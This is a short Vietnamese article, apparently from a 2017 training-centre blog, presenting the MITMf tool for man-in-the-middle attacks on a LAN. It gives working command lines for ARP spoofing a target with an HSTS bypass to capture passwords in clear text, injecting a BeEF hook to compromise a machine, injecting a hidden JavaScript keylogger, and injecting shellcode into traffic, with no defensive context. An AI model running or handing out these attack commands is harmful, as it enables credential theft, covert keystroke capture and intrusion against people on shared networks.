Bẻ gãy" cơ chế HSTS trên Chrome và Firefox

11:07 21-06-2017BKAP Media

Có thể nói trong mạng LAN, tấn công hiệu quả và nguy hiểm nhất là MITM.

be-gay-co-che-hsts-tren-chrome-va-firefox-01

Với tấn công MITM, kẻ tấn công có thể ăn cắp cookie, ăn cắp thông tin cá nhân, tài khoản mạng xã hội, thậm chí là xâm nhập vào máy tính của nạn nhân. Hiện nay, có rất nhiều công cụ mã nguồn mở cho phép thực hiện các chức năng trên, nhưng để tìm một công cụ có thể làm được tất cả những chức năng trên thì có lẽ hơi khó. MITMF là một công cụ mà đáp ứng được yêu cầu này.

MITMF được viết bởi Marcello Salvati sử dụng ngôn ngữ lập trình python.

be-gay-co-che-hsts-tren-chrome-va-firefox-02

Với MITMF bạn có thể thực hiện rất nhiều kiểu tấn công khác nhau như spoof arp, spoof dns, spoof dhcp, phá vỡ cơ chế bảo mật HSTS, inject javascript, .... với cú pháp vô cùng đơn giản.

Để cài đặt mitmf trong Kali Linux, các bạn dùng lệnh sau:
apt-get install mitmf
+ Để phá vỡ cơ chế bảo mật HSTS để hiển thị mật khẩu ở dạng clear-text, bạn dùng lệnh sau:
mitmf -i wlan0/eth0 --spoof --arp --gateway 192.168.1.1 --target targetIP --hsts

Để rõ hơn các bạn có thể xem video dưới đây:

+ Bạn có thể xâm nhập máy tính, không cần tương tác của người dùng bằng cách inject BEEF hook js với lệnh:
mitmf -i wlan0/eth0 --spoof --arp --gateway 192.168.1.1 --target targetIP --js-url 
Để rõ hơn các bạn có thể xem video dưới đây
+ Inject jskeylogger để ghi lại toàn bộ thao tác bàn phím mà người dùng không hề biết với lệnh:
mitmf -i wlan0/eth0 --spoof --arp --gateway 192.168.1.1 --target targetIP --jskeylogger
Để rõ hơn các bạn tham khảo video dưới đây:


+ Inject shellcode vào gói tin với lệnh:
mitmf -i wlan0/eth0 --spoof --arp --gateway 192.168.1.1 --target targetIP --filepwn
Để rõ hơn các bạn tham khảo video dưới đây:

Nguồn: Sưu tầm

   0968276996